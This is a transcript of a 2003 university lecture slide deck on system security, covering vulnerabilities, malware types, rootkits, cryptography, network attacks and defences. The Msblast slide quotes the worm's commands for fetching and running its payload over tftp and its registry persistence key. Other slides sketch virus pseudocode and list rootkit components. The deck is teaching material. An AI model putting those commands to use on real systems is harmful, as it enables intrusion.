System Security - PowerPoint PPT Presentation

1 / 75

About This Presentation

Title:

System Security

Description:

W6 LAN Manager Authentication -- Weak LM Hashing. W7 No Passwords or Weak Passwords ... Blowfish. SysSec/SIAC2003. Mateti/WrightStateU. 42. Public and Private Keys ... – PowerPoint PPT presentation

Number of Views:59

Avg rating:3.0/5.0

Slides: 76

Provided by: csWr

Category:

more less

Transcript and Presenter's Notes

Title: System Security

1
System Security

Prabhaker Mateti
Wright State University

A Few Assessments

3
Top 20 Vulnerabilities/ NIPCFBISANS(May 29,
2003)

W1 Internet Information Services (IIS)
W2 MDAC Remote Data Services
W3 Microsoft SQL Server
W4 NETBIOS -- Unprotected Networking Shares
W5 Anonymous Logon -- Null Sessions
W6 LAN Manager Authentication -- Weak LM Hashing
W7 No Passwords or Weak Passwords
W8 Internet Explorer
W9 Remote Registry Access
WA Windows Scripting Host

4
Top 20 Vulnerabilities/ NIPCFBISANS(May 29,
2003)

U1 RPC Remote Procedure Calls
U2 Apache Web Server
U3 Secure Shell (SSH)
U4 SNMP
U5 File Transfer Protocol (FTP)
U6 R-Services -- Trust Relationships
U7 Line Printer Daemon (LPD)
U8 Sendmail
U9 BIND/DNS
UA No Passwords or Weak Passwords

5
Threats To The National Infrastructures
(Defense Science Board)

Incomplete, inquisitive and unintentional
blunders.
Hackers driven by technical challenges.
Disgruntled employees or customers seeking
revenge.
Criminals interested in personal financial gain
or stealing services.
Organized crime with the intent of hiding
something or financial gain.
Organized terrorist groups attempting to
influence U.S. policy by isolated attacks.
Foreign espionage agents seeking to exploit
information for economic, political, or military
purposes.
Tactical countermeasures intended to disrupt
specific weapons or command structures.
Multifaceted tactical information warfare applied
in a broad orchestrated manner to disrupt a major
U.S. military mission.
Large organized groups or nation-states intent on
overthrowing the United States.

6
Just the facts Madam
7
Security Incidents / CERT

76,404 Jan June 2003
82,094 all of 2002
CERT uses the word "incident" as an
administrative term that groups together any
related set of activities for example,
activities in which the same tool or exploit is
used by an intruder. A single "incident" can
involve anything from a single host computer to a
very large number of host computers, at a single
site or at hundreds of thousands of sites.

8
Number of Hosts in the DNS(isc.org Internet
Domain Survey, Jan 2003)
Jan 2003 171,638,297 Jul 2002 162,128,493
Jan 2002 147,344,723 Jul 2001 125,888,197
Jan 2001 109,574,429 Jul 2000 93,047,785
Jan 2000 72,398,092
9
(No Transcript)
10

Terms

11
So you got r00ted.

Your machine has been compromised.
root administrator super-user
An unauthorized user has obtained root
privileges.
A rootkit may have been installed.
Forensic analyses made with tools existing on
that system are unreliable.

12
Denial of Service (DoS)

We think of computer systems as providing
services to authorized users.
When a system is deliberately made to crash, or
made to run legitimate users' programs so very
slowly that it is unusable, we refer to it as a
"denial of service attack."
The attacker accomplishes this by running certain
cleverly composed programs, and is pre-aware of
the consequences.

13
Black Hats v. White Hats

Black hats are the "bad" guys in that they use
their knowledge to unauthorizedly break into even
more systems, and pass their knowledge to other
insiders.
White hats are the "good" guys they are mostly
into forensics and prevention of attacks.

14
Vulnerability,

Vulnerability A weakness that can be exploited
to cause damage.
Attack A method of exploiting a vulnerability.
Threat A motivated, capable adversary that
mounts attacks.

15
Hacker v. Attacker v. Intruder

Hacker One who programs enthusiastically, even
obsessively.
An expert at a particular program, as in a Unix
hacker.
A hacker enjoys exploring the details of
programmable systems and how to stretch their
capabilities.
A hacker has ethics.

16
Viruses

Viruses are "programs" that modify other programs
on a computer, inserting copies of themselves.
Viruses are not officially programs
They cannot run on their own.
Need to have some host program.
When the host program is run, the virus runs.

17
Structure of Viruses

V()
infectExecutable()
if (triggered()) doDamage()
jump to main of infected program
void infectExecutable()
file chose an uninfected executable file
prepend V to file
void doDamage() ...
int triggered() return (some test? 1 0)

18
Worms

Worms are programs that propagate from computer
to computer on a network.
Worms can run independently.
Worms may have (different) portions of themselves
running on many different machines.
Worms do not change other programs, although they
may carry other code that does.

19
Trojans

A Trojan mimics the functionality of its namesake
legitimate program.
But has a hidden agenda.
Ex wu-ftpd Trojan - Login with specific
user/password gives a root shell.

20
Backdoors

Also called trap doors.
Allow unauthorized access to a system.
The absence of backdoors cannot be established.

21
Malware

Viruses Worms Trojans
Any program that has a malicious intent

22
System Security

System Security
Computer Security Network Security Internet
Security
Trojan Horses, Viruses and Worms
Privacy and Authentication
TCP/IP exploits
Firewalls
Secure Configuration of Personal Machines
Buffer Overflow and Other Bug Exploitation
Writing Bug-free and Secure Software
Secure e-Commerce Transactions

Current practices, and their problems

24
Improper Configuration

Out of the box installations are rarely properly
configured.
Standard user accounts with standard passwords.
Running unneeded services.
Leaving sensitive files read/write-open.

25
Fortification

Start with a properly configured system.
Delete weak or unneeded components.
Add protective layers.
Keep detailed logs.

26
Hardened OS

Often equated with fortification.
Rebuilding an OS from the same source code but by
using a more rigorous compiler.
Redesigning portions of an OS.
Statically v. dynamically configured.

27
Rootkits

A rootkit is a collection of tools and utilities
that attackers use to hide their presence and
gather data to help them infiltrate further
across the network. Rootkits insert backdoors,
install Trojans, and patch existing programs.
A rootkit may disable auditing when a certain
user is logged on.
A rootkit could allow anyone to log in if a
certain backdoor password is used.
A rootkit could patch the kernel itself, allowing
anyone to run privileged code if they use a
special filename
Installed after the attacker gains access.
Cannot be detected by firewalls or anti-virus
scanners.
203 results for search rootkit on
www.packetstormsecurity.org

28
Rootkits

Rootkit was originally a Unix term, derived
from the word root.
Unix rootkits typically replace system binaries
with trojaned binaries.
The trojaned binaries hide the attacker
activities

29
Windows Rootkit

A Windows rootkit typically replaces APIs, not
binaries.
Any program that calls those replaced APIs is
potentially affected.
The rootkit typically hides itself using the
hacked Windows installation.
A typical Windows rootkit can hide files,
folders, processes, services, and registry
entries

30
Windows Rootkit Examples

null.sys
HE4Hook
Hacker Defender
Slanret
He4Hook
Vanquish
Fu

31
Null session

Unauthenticated connection
Empty username, empty password
Null sessions can always be established to
NT4, Windows 2000, and Windows XP machines. If
the machine's server service is enabled, and
ports 139 or 445 are available, then you can do a
net use with anonymous credentials, and the
system will respond with "Command completed
successfully". This has not changed from NT4 to
Win2K to XP. -- FOCUS-MS_at_securityfocus.com

32
Linux Rootkit Examples

Linux Rootkit (LRK)
TeLeKit
Adore
Knark
t0rnkit
Kernel Intrusion System (KIS)

33
_ _ ____ _
_ _ _ ___ ___ ___ (_)_ __ _ ___
__ _ \ ___ ___ _ _(_) _ _ __ __
_ '_ \ \ \/ / _) / _ \ / _ \
__ / / __ ___ _
gt lt _ lt (_) (_) _ lt _
_______ _\__,_/_/\_\ _ \_\___/ \___/
\___\_\_\__ _________

chfn Trojaned! User-gtr00t
chsh Trojaned! User-gtr00t
inetd Trojaned! Remote access
login Trojaned! Remote access
ls Trojaned! Hide files
du Trojaned! Hide files
ifconfig Trojaned! Hide sniffing
netstat Trojaned! Hide connections
passwd Trojaned! User-gtr00t
ps Trojaned! Hide processes
top Trojaned! Hide processes
rshd Trojaned! Remote access
syslogd Trojaned! Hide logs
linsniffer Packet sniffer!
fix File fixer!
z2 Zap2 utmp/wtmp/lastlog eraser!
wted wtmp/utmp editor!
lled lastlog editor!
bindshell port/shell type daemon!

34
Msblast.exe(Aug 12, 2003)

The exploit code is derived from the well known
dcom.c exploit.
Exploits the MS DCOM RPC vulnerability using TCP
port 135.
Produces a remote command line shell.
Runs the following commands
tftp -i x.x.x.x GET msblast.exe
start msblast.exe
msblast.exe
Creates the following registry key to run at
boot
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
\windows auto update 'msblast.exe'
The worm will begin to scan the local class B
subnet, and will also generate a random address
to begin scanning at, then will sequentially scan
from that point forward incrementing by host
address, class c, class b and class a. It can
scan hosts at a rate of 20 per second.
The worm contains the following text, which does
not get displayed
I just want to say LOVE YOU SAN!! billy gates
why do you make this possible ? Stop making money
and fix your software!!

35
Booting Up

BIOS
OS Kernel
Initialization
User logins

36
boot.ini
boot loader timeout30 defaultmulti(0)disk(0)rd
isk(0)partition(9)\WINDOWS operating
systems C\bootsect\hdc3grub.bin"Booting From
FAT32on120GB" multi(0)disk(0)rdisk(0)partition(3)
\WINDOWS"Windows XP Pro r0 p3"
/fastdetect multi(0)disk(0)rdisk(0)partition(9)\WI
NDOWS"Windows XP Pro r0 p9" /fastdetect multi(0)d
isk(0)rdisk(0)partition(14)\WINDOWS"Windows XP
Pro r0 p14" /fastdetect C\bootsect\hdc3grub.bin"
Linux via Grub"
37
/boot/grub/menu.lst

timeout 10
default 1
title failsafe
kernel (hd0,6)/boot/vmlinuz root/dev/hda7
failsafe devfsnomount hdcide-scsi acpioff
initrd (hd0,6)/boot/initrd.img
title linux-smp
kernel (hd0,6)/boot/vmlinuz-smp root/dev/hda7
devfsmount hdcide-scsi acpioff
initrd (hd0,6)/boot/initrd-smp.img
title windows
root (hd0,0)
chainloader 1

38
Human User Authentication

Something you know
(e.g., a password or other secret)
Something you have
(e.g., smart card, credit card)
Something you are
(e.g., fingerprints, retinal scan, voice print).

39
Passwords

Weak passwords social engineering.
telnet, ftp, passwords travel the network in
the clear can be sniffed.
One Time Passwords

40
Cryptography

"Computationally Infeasible
N 2a 3b 5c 7d ...
One way hash function
takes a variable-length input sequence of bytes
and converts it into a fixed-length sequence.
designed to be computationally infeasible to
reverse the process

41
Symmetric Keys

sender and receiver of a message share a single,
common key.
If ct encryption (pt, key), then pt
decryption (ct, key).
DES
IDEA
Blowfish

42
Public and Private Keys

a public key known to everyone, and a private or
secret key known only to the recipient of the
message
The two keys are mathematically related, yet it
is computationally infeasible to deduce one from
the other.
A global registry of public keys is needed
RSA

43
Man-in-the-Middle Attack

The public key-based communication between say
Alice and Bob is vulnerable.
Let us assume that Mallory, a cracker, not only
can listen to the traffic between Alice and Bob,
but also can modify, delete, and substitute
Alice's and Bob's messages, as well as introduce
new ones. Mallory can impersonate Alice when
talking to Bob and impersonate Bob when talking
to Alice. Here is how the attack works.
Bob sends Alice his public key. Mallory
intercepts the key and sends her own public key
to Alice.
Alice generates a random session key, encrypts it
with "Bobs" public key (which is really
Mallory's), and sends it to Bob.
Mallory intercepts the message. He decrypts the
session key with his private key, encrypts it
with Bob's public key, and sends it to Bob.
Bob receives the message thinking it came from
Alice. He decrypts it with his private key and
obtains the session key.
Alice and Bob start exchanging messages using the
session key. Mallory, who also has that key, can
now decipher the entire conversation.

44
Buffer Overflow

Quick What's the computer vulnerability of
the decade? It's not the Y2K bug, according to
computer science and security analysts, but a
security weakness known as the buffer overflow .
Executable code is injected on to the runtime
stack.
The return address that was on the stack is
modified to point to the beginning of this code.
The executable code chosen produces a shell.
A root-privileged program is so exploited so,
you are r00ted.

45
Buffer Overflow

Many of the Top 20 vulnerabilities are buffer
overflow problems.
Caused by a simple class of programming errors.
C and its promiscuous style.

46
Network Security
47
Security of the Connection

Least secure Wireless networking
Second least secure Always-on wired connections
Second most secure Intermittent wired
connections (dial-up)
Most secure Never connected.

48
TCP/IP Design Problems

Designed with too little concern for security.
All data, including various fields in the
protocol headers, are sent in the clear.
Sender and Receiver in the packet can be spoofed.

49
IP4 Spoofing

IP address a.b.c.d, 4-bytes.
IP packet contains the IP addresses of sender and
receiver.
Everything in the clear.
IP spoofing replaces the IP address of (usually)
the sender or (in rare cases) the destination
with a different address.
Services that authenticate based on the IP
addresses are vulnerable.
RPC, NFS, r-commands (rlogin, rsh, rcp, etc.), X
windows,

50
IP Fragment Attacks

When packets are too large to be sent in a single
IP packet, due to interface hardware limitations
for example, they can be split up by an
intermediate router.
The final destination will reassemble all the
fragments of an IP packet.
Attackers create artificially fragmented packets
in order to circumvent firewalls that do not
perform packet reassembly.
In the IP layer implementations of nearly all OS,
there are bugs in the reassembly code.
Attackers create fragments that trigger these
bugs.

51
IPsec

Data Confidentiality IPSec sender can encrypt
packets before transmitting them across a
network.
Data Integrity IPSec receiver can authenticate
packets sent by the IPSec sender to ensure that
the data has not been altered during
transmission.
Data Origin Authentication IPSec receiver can
authenticate the source of the IPSec packets
sent. This service is dependent upon the data
integrity service.
Anti-Replay IPSec receiver can detect and reject
replayed packets.
Two encryption modes Transport and Tunnel.

52
IP6

Expanded Addressing Capabilities
Header Format Simplification
Improved Support for Extensions and Options
Flow Labeling Capability
Authentication and Privacy Capabilities

53
TCP Exploits

The SYN Flood
Connection Killing by RST
Closing a Connection by FIN
Connection Hijacking

54
Covert Channels
55
Probing
56
Sniffers

A packet sniffer is a program that eavesdrops on
the network traffic.
It copies packets as they pass the NIC.
An NIC in the normal mode reads packets destined
to its specific MAC address, and all other
packets are ignored.
An NIC in promiscuous mode, receives all packets
regardless of the MAC address.

57
Packet Filters
58
Firewalls

Packet filters

59
Windows XP Built-in Firewall
60
Well known Trojan Portssample

22 TCP Shaft
23 TCP Fire Hacker
41 TCP Deep Throat
41 TCP Deep Throat
456 TCP Hacker's Paradise
901 TCP Backdoor.Devil
999 TCP DeepThroat
6712 TCP Sub Seven
8879 TCP UDP BackOrifice 2000
27444 UDP Trin00/TFN2K
40412 TCP The Spy
65535 TCP Adore Worm/Linux

61
Distributed Denial of Service (DDoS)

Several machines participate in a DoS attack of a
victim.
These participants are often compromised innocent
machines serving the attacks.
A remote client triggers the attack servers.

62
DNS Attacks
63

Protecting Our Systems

64
Security Software

Secure Shell, PGP,
Firewall Kits
Tools
Top 50 Security Tools survey from www.nmap.org
http//www.packetfactory.net
nmap, SAINT,
tcpdump, ethereal, snort,
Password cracking
Tcpwrapper

65
SSH (Secure Shell)

telnet, rlogin, do not authenticate the remote
machine SSH does.
The password that the user types as part of the
login ritual is sent as clear text by telnet and
rlogin SSH sends it encrypted.
The data being sent and received by the RTF is
also sent as clear text SSH sends and receives
it in encrypted form.

66
SSH (Secure Shell)

ssh1 v. ssh2
SSH exploits do exist.
Susceptible to man in the middle attack
Encryption and decryption consumes computing and
elapsed time.
Can be a nuisance. If the remote system has been
legitimately reinstalled ...

67
SSH client and servers

ssh
putty
ttermpro
openssh

68
VPN (Virtual Private Network)

Data travels over public networks, usually the
Internet.
The information needed to allow the data packets
to be routed between the source node and the
destination node is available to the public
medium as in ordinary TCP/IP traffic,
But, all other information is encrypted.
PPTP, L2TP, IPsec

69
File Integrity

Is the file what I installed? Did it change?
Time stamps, file size, are not reliable.
MD5 checksums.
The MD5 algorithm takes as input an arbitrary
length byte sequence and produces a 16-byte
"fingerprint" or "message digest" of the input.
It is conjectured that it is computationally
infeasible to produce two messages having the
same message digest, or to produce any message
having a given pre-specified target message
digest.

70
Scanning for Viruses

Scanners hook themselves in the read/write
methods of the file sys.
Search for patterns in the file content.
Search for specific file names,
Can yield false positives.
Can miss identifying malware.

71
Intrusion Detection
72
Amazon.com book search results(2003/08/26)
73
Web Sites

There is an oceanic amount of material on
network security available over the Internet.
-- A Web Page.
How do we define a Security Web Site?
1000 web sites

74
A Few Chosen Security Websites